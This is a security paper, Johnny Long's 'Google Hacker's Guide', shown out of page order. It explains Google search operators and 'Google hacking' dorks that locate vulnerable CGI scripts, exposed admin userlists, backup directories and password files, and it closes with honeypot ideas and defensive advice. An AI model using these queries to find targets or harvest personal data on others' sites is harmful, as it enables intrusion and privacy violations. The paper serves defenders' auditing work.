vulnerabilities. Searching for vulnerable programs is yet another trick of the Google
hacker.
Using Google as a CGI scanner
The ‘CGI scanner’ or ‘web scanner’ has become one of the most indispensable tools in
the world of web server hacking. Mercilessly searching out vulnerable programs on a
server, these programs help pinpoint potential avenues for attack. These programs are
brutally obvious, incredibly noisy and fairly accurate tools. However, the accomplished
Google hacker knows there are more subtle and interesting ways to attempt the same
task.
In order to accomplish their task, these scanners must know exactly what to search for on
a web server. In most cases these tools scan web servers looking for
vulnerable files, or for directories that may contain sample code or vulnerable files. Either
way, the tools generally store these vulnerabilities in a file that is formatted like the
following excerpt:
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
How this technique can be used
The lines in a vulnerability file like the one shown above can serve as a roadmap for a
Google hacker. Each line can be broken down and used in either an ‘index.of’ or an
‘inurl’ search to find vulnerable targets. For example, a Google search for
‘allinurl:/random_banner/index.cgi’ returns the results shown in Figure 15.
Figure 15: Example search using a line from a CGI scanner
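The breakdown of a scanner line into the two query styles mentioned above can be sketched in a few lines of Python. This is only an illustration: scanner_line_to_queries is a hypothetical helper, and the exact shape of the ‘index.of’ query (the file name appended to intitle:index.of) is an assumption.

```python
def scanner_line_to_queries(line):
    """Build an 'allinurl' query and an 'index.of' query from one scanner path."""
    path = line.strip()
    # The last path component is the file (or directory) name of interest.
    filename = path.rstrip("/").rsplit("/", 1)[-1]
    return {
        "inurl": f"allinurl:{path}",
        "index_of": f"intitle:index.of {filename}",
    }

queries = scanner_line_to_queries("/random_banner/index.cgi")
print(queries["inurl"])
print(queries["index_of"])
```

The first printed query is the same one used for Figure 15.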
A hacker can take sites returned from this Google search, apply a bit of hacker ‘magic’
and eventually get the broken ‘random_banner’ program to cough up any file on that
web server, including the password file as shown in Figure 16.
Figure 16: password file captured from a vulnerable site found using a Google search
Of the many Google hacking techniques we’ve looked at, this technique is one of the
best candidates for automation since the CGI scanner vulnerability files can be very
large. The gooscan tool, written by j0hnny, performs this and many other functions.
Gooscan and automation are discussed later.
Using Google to find interesting files and directories
Using Google to find vulnerable targets can be very rewarding. However, it is often more
rewarding to find not only vulnerabilities but also sensitive data that is not meant for
public viewing. People and organizations leave this type of data on web servers all the
time (trust me, I’ve found quite a bit of it). Now remember, Google is only crawling a
small percentage of the pages that contain this type of data, but the tradeoff is that
Google’s data can be retrieved quickly, quietly and without much fuss.
It is not uncommon to find sensitive data such as financial information, social security
numbers, medical information, and the like.
How this technique can be used
Of all the techniques examined thus far, this technique is the hardest to describe because
it takes a bit of imagination and sometimes just a bit of luck. Often the best way to find
sensitive files and directories is to find them in the context of other “important” words and
phrases.
Example:
Consider the fact that many people store an entire hodgepodge of data inside backup
directories. Oftentimes, the entire content of a web server or personal computer can be
found in a directory called backup. Using a simple query like “inurl:backup” can
yield potential backup directories, yet refining the search to something like
“inurl:backup intitle:index.of inurl:admin” can reveal even more
relevant results.
A query like “inurl:admin” can often reveal administrative directories. Several
combinations of this query are often fruitful. For example:
“inurl:admin intitle:login” can reveal admin login pages
“inurl:admin filetype:xls” can reveal interesting Excel spreadsheets either
named “admin” or stored in a directory named “admin”. Educational institutions are
notorious for falling victim to this search.
“inurl:admin inurl:userlist” is a generic catch-all query which finds many
different types of administrative userlist pages. These results may take some sorting
through, but the benefits are certainly worth it, as results include usernames,
passwords, phone numbers and addresses.
“inurl:admin filetype:asp inurl:userlist” will find more specific examples
of an administrator’s user list function, this time written in an ASP page. In most cases,
these types of pages do not require authentication.
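When checking your own site for this kind of exposure, the same queries can be narrowed to a single domain with the ‘site’ operator. The Python sketch below simply assembles the query strings from the examples in this section. The names ADMIN_QUERIES and audit_queries are hypothetical, and example.com stands in for your own domain.

```python
# Query fragments taken from the examples in this section.
ADMIN_QUERIES = [
    "inurl:admin",
    "inurl:admin intitle:login",
    "inurl:admin filetype:xls",
    "inurl:admin inurl:userlist",
    "inurl:admin filetype:asp inurl:userlist",
    "inurl:backup intitle:index.of inurl:admin",
]

def audit_queries(site):
    """Prefix each query with the 'site' operator so results stay on one domain."""
    return [f"site:{site} {query}" for query in ADMIN_QUERIES]

for query in audit_queries("example.com"):
    print(query)
```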
About Google automated scanning
With so many potential search combinations available, it’s obvious that an automated
tool scanning for a known list of potentially dangerous pages would be extremely useful.
However, Google frowns on such automation as quoted at
http://www.google.com/terms_of_service.html:
“You may not send automated queries of any sort to Google's system without
express permission in advance from Google. Note that "sending automated
queries" includes, among other things:
• using any software which sends queries to Google to determine how a
website or webpage "ranks" on Google for various queries;
• "meta-searching" Google; and
• performing "offline" searches on Google.”
Google does offer an alternative in the form of the Google Web APIs found at
http://www.google.com/apis/. There are several major drawbacks to the Google API
program at the time of this writing. First, users and developers of Google API programs
must both have Google license keys. This puts a damper on the potential user base of
Google API programs. Second, API-created programs are limited to 1,000 queries per
day since “The Google Web APIs service is an experimental free program, so the
resources available to support the program are limited.” (according to the API FAQ found
at http://www.google.com/apis/api_faq.html#gen12.) With so many potential searches,
1,000 queries is simply not enough.
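To put the limit in perspective, a quick calculation shows how long a larger scan would take at 1,000 queries per day. The workload below (300 search strings against 50 sites) is a made-up figure for illustration only.

```python
import math

DAILY_LIMIT = 1000  # queries per day, per the API FAQ quoted above

def days_needed(num_queries, daily_limit=DAILY_LIMIT):
    """Number of whole days required to send num_queries under a daily cap."""
    return math.ceil(num_queries / daily_limit)

# Hypothetical workload: 300 search strings checked against 50 sites.
total_queries = 300 * 50
print(total_queries, "queries need", days_needed(total_queries), "days")
```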
The bottom line is that any user running an automated Google querying tool (with the
exception of API created tools) must obtain express permission in advance to do so. It is
unknown what the consequences of ignoring these terms of service are, but it seems
best to stay on Google’s good side.
The only exception to this rule appears to be the Google search appliance (described
below). The Google search appliance does not have the same automated query
restrictions since the end user, not Google, owns the appliance. One should, however,
obtain advance express permission from the owner or maintainer of the Google
appliance before searching it with any automated tool for various legal and moral
reasons.
Other Google stuff
Google Appliances
The Google search appliance is described at http://www.google.com/appliance/:
“Now the same reliable results you expect from Google web search can be yours
on your corporate website with the Google Search Appliance. This combined
hardware and software solution is easy to use, simple to deploy, and can be up
and running on your intranet and public website in just a few short hours.”
The Google appliance can best be described as a locally controlled and operated
mini-Google search engine for individuals and corporations. When querying a Google
appliance, the queries listed above in the “URL Syntax” section often will not work.
Extra parameters are often required to perform a manual appliance query. Consider
running a search for "Steve Hansen" at the Google appliance found at Stanford. After
entering this search into the Stanford search page, the user is whisked away to a page
with this URL (chopped for readability):
http://find.stanford.edu/search?q=steve+hansen
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
Breaking this up into chunks reveals three distinct pieces. First, the target appliance is
find.stanford.edu. Next, the query is "steve hansen" or "steve+hansen" and
last but not least are all the extra parameters:
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
These parameters may differ from appliance to appliance, but it has become clear that
there are several default parameters that are required from a default installation of the
Google appliance like the one found at find.stanford.edu.
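The same three-way split can be done programmatically. The following Python sketch uses the standard urllib.parse module on the Stanford URL shown above. The function name split_appliance_url is illustrative, and the code only takes the URL apart; it does not contact the appliance.

```python
from urllib.parse import urlsplit, parse_qsl

# The appliance URL from the text, rejoined into a single string.
url = ("http://find.stanford.edu/search?q=steve+hansen"
       "&site=stanford&client=stanford&proxystylesheet=stanford"
       "&output=xml_no_dtd&as_dt=i&as_sitesearch=")

def split_appliance_url(url):
    """Return (appliance host, search query, list of extra parameters)."""
    parts = urlsplit(url)
    # keep_blank_values preserves empty parameters such as 'as_sitesearch='.
    params = parse_qsl(parts.query, keep_blank_values=True)
    query = next((value for key, value in params if key == "q"), None)
    extras = [(key, value) for key, value in params if key != "q"]
    return parts.netloc, query, extras

host, query, extras = split_appliance_url(url)
print(host)
print(query)
for key, value in extras:
    print(f"{key}={value}")
```

Comparing the extras list across several appliances is one way to see which parameters a given installation expects.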
Googledorks
The term “googledork” was coined by Johnny Long (http://johnny.ihackstuff.com) and
originally meant “An inept or foolish person as revealed by Google.” After a great deal of
media attention, the term came to describe those “who troll the Internet for confidential
goods.” Either term is fine, really. What matters is that the term googledork conveys the
concept that sensitive stuff is on the web, and Google can help you find it. The official
googledorks page (found at http://johnny.ihackstuff.com/googledorks) lists many different
examples of unbelievable things that have been dug up through Google by the
maintainer of the page, Johnny Long. Each listing shows the Google search required to
find the information along with a description of why the data found on each page is so
interesting.
Gooscan
Gooscan (http://johnny.ihackstuff.com) is a UNIX (Linux/BSD/Mac OS X) tool that
automates queries against Google search appliances, but with a twist. These particular
queries are designed to find potential vulnerabilities on web pages. Think "cgi scanner"
that never communicates directly with the target web server, since all queries are sent to
Google, not to the target. For the security professional, gooscan serves as a front-end
for an external server assessment and aids in the "information gathering" phase of a
vulnerability assessment. For the web server administrator, gooscan helps discover what
the web community may already know about a site thanks to Google.
Gooscan was not written using the Google API. This raises questions about the “legality”
of using gooscan as a Google scanner. Is gooscan “legal” to use? You should not use
this tool to query Google without advance express permission. Google appliances,
however, do not have these limitations. You should, however, obtain advance express
permission from the owner or maintainer of the Google appliance before searching it
with any automated tool for various legal and moral reasons. Only use this tool to
query appliances unless you are prepared to face the (as yet unquantified) wrath
of Google.
Although there are many features, the gooscan tool’s primary purpose is to scan Google
(as long as you obtain advance express permission from Google) or Google appliances
(as long as you have advance express permission from the owner/maintainer) for the
items listed on the googledorks page. In addition, the tool allows for a very thorough CGI
scan of a site through Google (as long as you obtain advance express permission from
Google) or a Google appliance (as long as you have advance express permission from
the owner/maintainer of the appliance). Have I made myself clear about how this tool is
intended to be used? Get permission! =) Once you have received the proper advance
express permission, gooscan makes it easy to measure the Google exposure of yourself
or your clients.
GooPot
The concept of a honeypot is very straightforward. According to techtarget.com:
“A honey pot is a computer system on the Internet that is expressly set up to
attract and ‘trap’ people who attempt to penetrate other people's computer
systems.”
In order to learn about how new attacks might be conducted, the maintainers of a
honeypot system monitor, dissect and catalog each attack, focusing on those attacks
which seem unique.
An extension of the classic honeypot system, a web-based honeypot or “pagepot” is
designed to attract those employing the techniques outlined in this paper. The concept is
fairly straightforward. A simple googledork entry like “inurl:admin
inurl:userlist” could easily be replicated with a web-based honeypot by creating
an index.html page which referenced another index.html file in an /admin/userlist
directory. If a web search engine like Google were instructed to crawl the top-level
index.html page, it would eventually find the link pointing to /admin/userlist/index.html.
This link would satisfy the Google query of “inurl:admin inurl:userlist”,
eventually attracting a curious Google searcher.
Once the Google searcher clicks on the link in the Google results, he is whisked away to the target web
page. In the background, the user’s web browser also sends many variables to that web
server, including one variable of interest, the “referrer” variable. This field contains the
complete name of the web page that was visited previously, or more clearly, the web site
that referred the user to the web page. The bottom line is that this variable can be
inspected to figure out how a web surfer found a web page assuming they clicked on
that link from a search engine page. This bit of information is critical to the maintainer of
a pagepot system, since it outlines the exact method the Google searcher used to locate
the pagepot system. The information aids in protecting other web sites from similar
queries.
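Inspecting the referrer can be as simple as pulling the search terms out of the URL. The Python sketch below assumes the referrer is a Google results URL that carries the search in its ‘q’ parameter; the function name search_terms_from_referrer and the sample referrer are illustrative.

```python
from urllib.parse import urlsplit, parse_qs

def search_terms_from_referrer(referrer):
    """Return the search string from a Google referrer URL, or None."""
    parts = urlsplit(referrer)
    # Only look at referrers that come from a Google host (simple substring check).
    if "google." not in parts.netloc:
        return None
    values = parse_qs(parts.query).get("q")
    return values[0] if values else None

# Hypothetical referrer as it might appear in a pagepot's web server log.
sample = "http://www.google.com/search?q=inurl%3Aadmin+inurl%3Auserlist"
print(search_terms_from_referrer(sample))
```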
The concept of a pagepot is not a new one thanks to many folks including the group at
http://www.gray-world.net/. Their web-based honeypot, hosted at
http://www.gray-world.net/etc/passwd/, is designed to entice those using Google like a CGI scanner. This
is not a bad concept, but as we’ve seen in this paper, there are so many other ways to
use Google to find vulnerable or sensitive pages.
Enter GooPot, the Google honeypot system designed by johnny@ihackstuff.com. By
populating a web server with sensitive-looking documents and monitoring the referrer
variables passed to the server, a GooPot administrator can learn about new web search
techniques being employed in the wild and subsequently protect his site from similar
queries. Beyond a simple pagepot, GooPot uses enticements based on the many
techniques outlined in the googledorks collection and this document. In addition, the
GooPot more closely resembles the juicy targets that Google hackers typically go after.
Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover
new search types and publicize them in the form of googledorks listings, creating a
self-sustaining cycle for learning about, and protecting against, search engine attacks.
Although the GooPot system is currently not publicly available, expect it to be made
available early 2Q 2004.
A word about how Google finds pages (Opera)
Although the concept of web crawling is fairly straightforward, Google has created other
methods for learning about new web pages. Most notably, Google has incorporated a
feature into the latest release of the Opera web browser. When an Opera user types a
URL into the address bar, the URL is sent to Google, and is subsequently crawled by
Google’s bots. According to the FAQ posted at http://www.opera.com/adsupport:
“The Google system serves advertisements and related searches to the Opera
browser through the Opera browser banner 468x60 format. Google determines
what ads and related searches are relevant based on the URL and content of the
page you are viewing and your IP address, which are sent to Google via the
Opera browser.”
As of the time of this writing it is unclear whether or not Google includes the link
in its search engine. However, testing shows that when an unindexed URL
(http://johnny.ihackstuff.com/temp/suck.html) was entered into Opera 7.2.3, a Googlebot
crawled the URL moments later as shown by the following access.log excerpts:
64.68.87.41 - "GET /robots.txt HTTP/1.0" 200 220 "-" "Mediapartners-Google/2.1 (+http://www.googlebot.com/bot.html)"
64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" "Mediapartners-Google/2.1 (+http://www.googlebot.com/bot.html)"
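Log entries like these can be picked out of an access log automatically. The Python sketch below parses lines in the abbreviated format shown in the excerpt, which is not a full Apache log format, and flags requests whose user agent names a Google crawler. The pattern and the helper names are assumptions made for illustration.

```python
import re

# Pattern for the abbreviated log format in the excerpt above:
# ip - "METHOD path protocol" status size "referrer" "user agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) - "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not match."""
    match = LOG_LINE.match(line.strip())
    return match.groupdict() if match else None

def is_google_crawler(agent):
    """True if the user agent string names one of Google's crawlers."""
    return "Googlebot" in agent or "Mediapartners-Google" in agent

line = ('64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" '
        '"Mediapartners-Google/2.1 (+http://www.googlebot.com/bot.html)"')
entry = parse_line(line)
if entry and is_google_crawler(entry["agent"]):
    print(entry["ip"], "crawled", entry["path"])
```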
The privacy implications of this could be staggering, especially if Opera users expect
visited URLs to remain private.
This feature can be turned off within Opera by selecting “Show generic selection of
graphical ads” from the “File -> Preferences -> Advertising” screen.
Protecting yourself from Google hackers
1. Keep your sensitive data off the web!
Even if you think you’re only putting your data on a web site temporarily, there’s a
good chance that you’ll either forget about it, or that a web crawler might find it.
Consider more secure ways of sharing sensitive data such as SSH/SCP or
encrypted email.
2. Googledork!
• Use the techniques outlined in this paper to check your own site for
sensitive information or vulnerable files.
• Use gooscan (from http://johnny.ihackstuff.com) to scan your site for bad
stuff, but first get advance express permission from Google! Without
advance express permission, Google could come after you for violating
their terms of service. The author is currently not aware of the exact
implications of such a violation. But why anger the “Goo-Gods”?!?
• Check the official googledorks website (http://johnny.ihackstuff.com) on a
regular basis to keep up on the latest tricks and techniques.
3. Consider removing your site from Google’s index.
The Google webmaster FAQ located at http://www.google.com/webmasters/
provides invaluable information about ways to properly protect and/or expose
your site to Google. From that page:
“Please have the webmaster for the page in question contact us with proof that
he/she is indeed the webmaster. This proof must be in the form of a root level
page on the site in question, requesting removal from Google. Once we receive
the URL that corresponds with this root level page, we will remove the offending
page from our index.”
In some cases, you may want to remove individual pages or snippets from Google’s
index. This is also a straightforward process which can be accomplished by
following the steps outlined at http://www.google.com/remove.html.
4. Use a robots.txt file.
Web crawlers are supposed to follow the robots exclusion standard found at
http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure
for “politely requesting” that web crawlers ignore all or part of your website. I
must note that hackers may not have any such scruples, as this file is merely a
suggestion. The major search engines’ crawlers honor this file and its contents.
For examples and suggestions for using a robots.txt file, see the above URL on
robotstxt.org.
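A robots.txt file can be tested before it is deployed. The Python sketch below uses the standard urllib.robotparser module to check which paths a well-behaved crawler would skip. The rules shown (blocking /admin/ and /backup/) are an example chosen to match the directories discussed in this paper, not a recommended policy.

```python
from urllib.robotparser import RobotFileParser

# Example rules only; adjust the paths to match your own site.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
"""

def is_allowed(robots_txt, agent, path):
    """True if the given crawler may fetch the path under these rules."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(agent, path)

for path in ("/admin/userlist/index.html", "/backup/site.tar", "/index.html"):
    verdict = "allowed" if is_allowed(ROBOTS_TXT, "Googlebot", path) else "blocked"
    print(path, verdict)
```

Keep in mind that the file itself is publicly readable, so it also tells a curious visitor which directories you would rather keep out of search engines.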
Thanks and shouts
First, I would like to thank God for taking the time to pierce my way-logical mind with
the unfathomable gifts of sight by faith and eternal life through the sacrifice of Jesus
Christ.
Thanks to my family for putting up with the analog version of j0hnny.
Shouts to the STRIKEFORCE, “Gotta_Getta_Hotdog” Murray, “Re-Ron” Shaffer, “2 cute
to B single” K4yDub, “Nice BOOOOOSH” Arnold, “Skull Thicker than a Train Track”
Chapple, “Bitter Bagginz” Carter, Fosta’ (student=teacher;), Tiger “Lost my badge”
Woods, LARA “Shake n Bake” Croft, “BananaJack3t” Meyett, Patr1ckhacks, Czup, Mike
“Scan Master, Scan Faster” Walker, “Mr. I Love JAVA” Webster, “Soul Sistah” G Collins,
Chris, Carey, Matt, KLOWE, haywood, micah. Shouts to those who have passed on:
Chris, Ross, Sanguis, Chuck, Troy, Brad.
Shouts to Joe “BinPoPo”, Steve Williams (by far the most worthy defender I’ve had the
privilege of knowing) and to “Bigger is Better” Fr|tz.
Thanks to my website members for the (admittedly thin) stream of feedback and
Googledork additions. Maybe this document will spur more submissions.
Thanks to JeiAr at GulfTech Security, Cesar
of Appdetective fame, and Mike “Supervillain” Carter for the outstanding contributions to
the googledorks database.
Thanks to Chris O'Ferrell (www.netsec.net), Yuki over at the Washington Post, Slashdot,
and TheRegister.co.uk for all the media coverage. While I’m thanking my referrers, I
should mention Scott Granneman for the front-page SecurityFocus article that was all
about Googledorking. He was nice enough to link me and call Googledorks his “favorite
site” for Google hacking even though he didn’t mention me by name or return any of my
emails. I’m not bitter though… it sure generated a lot of traffic! After all the good press,
it’s wonderful to be able to send out a big =PpPPpP to NewScientist Magazine for their
particularly crappy coverage of this topic. Just imagine, all this traffic could have been
yours if you had handled the story properly.
Shouts out to Seth Fogie, Anton Rager, Dan Kaminsky, rfp, Mike Schiffman, Dominique
Brezinski, Tan, Todd, Christopher (and the whole packetstorm crew), Bruce Potter,
Dragorn, and Muts (mutsonline, whitehat.co.il) and my long lost friend Topher.
Hello’s out to my good friends SNShields and Nathan.
When in Vegas, be sure to visit any of the world-class properties of the MGM/Mirage or
visit them online at http://mgmmirage.com. =)
- Page 1 -
The Google Hacker’s Guide
Understanding and Defending Against
the Google Hacker
by Johnny Long
johnny@ihackstuff.com
http://johnny.ihackstuff.com
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 2 -
GOOGLE SEARCH TECHNIQUES................................................................................................................ 3
GOOGLE WEB INTERFACE.................................................................................................................................. 3
BASIC SEARCH TECHNIQUES .............................................................................................................................. 7
GOOGLE ADVANCED OPERATORS ........................................................................................................... 9
ABOUT GOOGLE’S URL SYNTAX .................................................................................................................... 12
GOOGLE HACKING TECHNIQUES........................................................................................................... 13
DOMAIN SEARCHES USING THE ‘SITE’ OPERATOR........................................................................................... 13
FINDING ‘GOOGLETURDS’ USING THE ‘SITE’ OPERATOR................................................................................. 14
SITE MAPPING: MORE ABOUT THE ‘SITE’ OPERATOR...................................................................................... 15
FINDING DIRECTORY LISTINGS ........................................................................................................................ 16
VERSIONING: OBTAINING THE WEB SERVER SOFTWARE / VERSION ............................................................. 17
via directory listings .................................................................................................................................. 17
via default pages ........................................................................................................................................ 19
via manuals, help pages and sample programs......................................................................................... 21
USING GOOGLE AS A CGI SCANNER................................................................................................................ 23
USING GOOGLE TO FIND INTERESTING FILES AND DIRECTORIES .................................................................... 25
ABOUT GOOGLE AUTOMATED SCANNING.......................................................................................... 26
OTHER GOOGLE STUFF .............................................................................................................................. 27
GOOGLE APPLIANCES ..................................................................................................................................... 27
GOOGLEDORKS................................................................................................................................................ 27
GOOSCAN ........................................................................................................................................................ 28
GOOPOT .......................................................................................................................................................... 28
A WORD ABOUT HOW GOOGLE FINDS PAGES (OPERA)................................................................. 30
PROTECTING YOURSELF FROM GOOGLE HACKERS...................................................................... 30
THANKS AND SHOUTS................................................................................................................................. 31
The Google search engine found at www.google.com offers many different features
including language and document translation, web, image, newsgroups, catalog and
news searches and more. These features offer obvious benefits to even the most
uninitiated web surfer, but these same features allow for far more nefarious possibilities
to the most malicious Internet users including hackers, computer criminals, identity
thieves and even terrorists. This paper outlines the more nefarious applications of the
Google search engine, techniques that have collectively been termed “Google hacking.”
The intent of this paper is to educate web administrators and the security community in
the hopes of eventually securing this form of information leakage.
Google search techniques
Google web interface
The Google search engine is fantastically easy to use. Despite the simplicity, it is very
important to have a firm grasp of these basic techniques in order to fully comprehend the
more advanced uses. The most basic Google search can involve a single word entered
into the search page found at www.google.com.
Figure 1: The main Google search page
As shown in Figure 1, I have entered the word “sardine” into the search screen. Figure 1
shows many of the options available from the www.google.com front page.
The Google toolbar: The Internet Explorer browser I am using has a Google “toolbar” (a free
download from toolbar.google.com) installed and presented under the address bar. Although the
toolbar offers many different features, it is not a required element for performing advanced
searches. Even the most advanced search functionality is available to any user able to access
the www.google.com web page with any type of browser, including text-based and mobile browsers.
“Web, Images, Groups, Directory and News” tabs: These tabs allow you to search web pages,
photographs, message group postings, Google directory listings, and news stories respectively.
First-time Google users should consider that these tabs are not always a replacement for the
“Submit Search” button.
Search term input field: Located directly below the alternate search tabs, this text field
allows the user to enter a Google search term. Search term rules will be described later.
“Submit Search”: This button submits the search term supplied by the user. In many browsers,
simply pressing the “Enter/Return” key after typing a search term will activate this button.
“I’m Feeling Lucky”: Instead of presenting a list of search results, this button will forward
the user to the highest-ranked page for the entered search term. Often, this page is the most
relevant page for the entered search term.
“Advanced Search”: This link takes the user to the “Advanced Search” page as shown in Figure 2.
Much of the advanced search functionality is accessible from this page. Some advanced features
are not listed on this page.
“Preferences”: This link allows the user to select several options (which are stored in cookies
on the user’s machine for later retrieval) including languages, filters, number of results per
page, and window options.
“Language tools”: This link allows the user to set many different language options and
translate text to and from various languages.
Figure 2: Advanced Search page
Once a user submits a search by clicking the “Submit Search” button or by pressing
enter in the search term input box, a results page may be displayed as shown in Figure
3.
Figure 3: A basic Google search results page.
The search results page allows the user to explore the search results in various ways.
Top line: The top line (found under the alternate search tabs) lists the search query, the
number of hits displayed and found, and how long the search took.
“Category” link: This link takes you to the Google directory category for the search you
entered. The Google directory is a highly organized directory of the web pages that Google
monitors.
Main page link: This link takes you directly to a web page. Figure 3 shows this as “Sardine
Factory :: Home page”.
Description: The short description of a site.
Cached link: This link takes you to Google’s copy of this web page. This is very handy if a
web page changes or goes down.
“Similar Pages”: This link takes you to similar pages based on the Google category.
“Sponsored Links” column: This column lists paid, targeted advertising links based on your
search query.
Under certain circumstances, a blank error page (See Figure 4) may be presented
instead of the search results page. This page is the catchall error page, which generally
means Google encountered a problem with the submitted search term. Many times this
means that a search query option was not entered properly.
Figure 4: The "blank" error page
In addition to the “blank” error page, another error page may be presented as shown in
Figure 5. This page is much more descriptive, informing the user that a search term was
missing. This message indicates that the user needs to add to the search query.
Figure 5: Another Google error page
There is a great deal more to Google’s web-based search functionality which is not
covered in this paper.
Basic search techniques
Simple word searches
Basic Google searches, as I have already presented, consist of one or more
words entered without any quotations or the use of special keywords. Examples:
peanut butter
butter peanut
olive oil popeye
‘+’ searches
When supplying a list of search terms, Google automatically tries to find every
word in the list of terms, making the Boolean operator “AND” redundant. Some
search engines may use the plus sign as a way of signifying a Boolean “AND”.
Google uses the plus sign in a different fashion. When Google receives a basic
search request that contains a very common word like “the”, “how” or “where”,
the word will often be removed from the query as shown in Figure 6.
Figure 6: Google removing overly common words
In order to force Google to include a common word, precede the search term with
a plus (+) sign. Do not use a space between the plus sign and the search term.
For example, the following searches produce slightly different results:
where quick brown fox
+where quick brown fox
The ‘+’ operator can also be applied to Google advanced operators, discussed
below.
‘-’ searches
Excluding a term from a search query is as simple as placing a minus sign (-)
before the term. Do not use a space between the minus sign and the search
term. For example, the following searches produce slightly different results:
quick brown fox
quick -brown fox
The ‘-’ operator can also be applied to Google advanced operators, discussed
below.
Phrase Searches
In order to search for a phrase, supply the phrase surrounded by double-quotes.
Examples:
“the quick brown fox”
“liberty and justice for all”
“harry met sally”
Arguments to Google advanced operators can be phrases enclosed in quotes, as
described below.
Mixed searches
Mixed searches can involve both phrases and individual terms. Example:
macintosh "microsoft office"
This search will only return results that include the phrase “microsoft office” and
the term macintosh.
Google advanced operators
Google allows the use of certain operators to help refine searches. The use of advanced
operators is very simple as long as attention is given to the syntax. The basic format is:
operator:search_term
Notice that there is no space between the operator, the colon and the search term. If a
space is used after a colon, Google will display an error message. If a space is used
before the colon, Google will use your intended operator as a search term.
Some advanced operators can be used as a standalone query. For example
‘cache:www.google.com’ can be submitted to Google as a valid search query. The
‘site’ operator, by contrast, must be used along with a search term, such as
‘site:www.google.com help’.
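The spacing rules above are easy to get wrong when queries are assembled by hand. The following is a minimal Python sketch of one way to build operator queries so that no space ever lands next to the colon. The function name operator_query is hypothetical and is not part of any Google tool; quoting multi-word arguments is an assumption based on the phrase-search rule described earlier.

```python
def operator_query(operator, argument, *extra_terms):
    """Build 'operator:argument' with no spaces around the colon.

    Hypothetical helper for illustration only.
    """
    argument = argument.strip()
    # A multi-word argument is quoted so it stays attached to the operator.
    if " " in argument and not argument.startswith('"'):
        argument = f'"{argument}"'
    parts = [f"{operator.strip()}:{argument}"]
    # Any additional plain search terms follow, separated by single spaces.
    parts.extend(extra_terms)
    return " ".join(parts)


print(operator_query("site", "www.google.com", "help"))
print(operator_query("cache", "www.google.com"))
print(operator_query("intitle", "index of"))
```

The first two calls reproduce the ‘site’ and ‘cache’ examples given above; the third shows a phrase passed as an operator argument.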
Table 1: Advanced Operator Summary
Operator    Description                                                     Additional search argument required?
site:       find search term only on site specified by search_term          YES
filetype:   search documents of type search_term                            YES
link:       find sites containing search_term as a link                     NO
cache:      display the cached version of page specified by search_term     NO
intitle:    find sites containing search_term in the title of a page        NO
inurl:      find sites containing search_term in the URL of the page        NO
site: find web pages on a specific web site
This advanced operator instructs Google to restrict a search to a specific web site or
domain. When using this operator, an additional search argument is required.
Example:
site:harvard.edu tuition
This query will return results from harvard.edu that include the term tuition anywhere on
the page.
filetype: search only within files of a specific type.
This operator instructs Google to search only within the text of a particular type of file.
This operator requires an additional search argument.
Example:
filetype:txt endometriosis
This query searches for the word ‘endometriosis’ within standard text documents. There
should be no period (.) before the filetype and no space around the colon following the
word “filetype”. It is important to note that Google only claims to be able to search within
certain types of files. Based on my experience, Google can search within most files that
present as plain text. For example, Google can easily find a word within a file of type
“.txt,” “.html” or “.php” since the output of these files in a typical web browser window is
textual. By contrast, while a WordPerfect document may look like text when opened with
the WordPerfect application, that type of file is not recognizable to the standard web
browser without special plugins and by extension, Google can not interpret the
document properly, making a search within that document impossible. Thankfully,
Google can search within specific types of special files, making a search like
“filetype:doc endometriosis” a valid one.
The current list of files that Google can search is listed in the filetype FAQ located at
http://www.google.com/help/faq_filetypes.html. As of this writing, Google can search
within the following file types:
• Adobe Portable Document Format (pdf)
• Adobe PostScript (ps)
• Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
• Lotus WordPro (lwp)
• MacWrite (mw)
• Microsoft Excel (xls)
• Microsoft PowerPoint (ppt)
• Microsoft Word (doc)
• Microsoft Works (wks, wps, wdb)
• Microsoft Write (wri)
• Rich Text Format (rtf)
• Text (ans, txt)
link: search within links
The hyperlink is one of the cornerstones of the Internet. A hyperlink is a selectable
connection from one web page to another. Most often, these links appear as underlined
text but they can appear as images, video or any other type of multimedia content. This
advanced operator instructs Google to search within hyperlinks for a search term. This
operator requires no other search arguments.
Example:
link:www.apple.com
This query would display web pages that link to Apple.com’s main page. This
special operator is somewhat limited in that the link must appear exactly as entered in
the search query. The above query would not find pages that link to
www.apple.com/ipod, for example.
cache: display Google’s cached version of a page
This operator displays the version of a web page as it appeared when Google crawled
the site. This operator requires no other search arguments.
Example:
cache:johnny.ihackstuff.com
cache:http://johnny.ihackstuff.com
These queries would display the cached version of Johnny’s web page. Note that both of
these queries return the same result. I have discovered, however, that sometimes
queries formed like these may return different results, with one result being the dreaded
“cache page not found” error. This operator also accepts whole URL lines as arguments.
intitle: search within the title of a document
This operator instructs Google to search for a term within the title of a document. Most
web browsers display the title of a document on the top title bar of the browser window.
This operator requires no other search arguments.
Example:
intitle:gandalf
This query would only display pages that contained the word ‘gandalf’ in the title. A
derivative of this operator, ‘allintitle’ works in a similar fashion.
Example:
allintitle:gandalf silmarillion
This query finds both the words ‘gandalf’ and ‘silmarillion’ in the title of a page. The
‘allintitle’ operator instructs Google to find every subsequent word in the query only in the
title of the page. This is equivalent to a string of individual ‘intitle’ searches.
inurl: search within the URL of a page
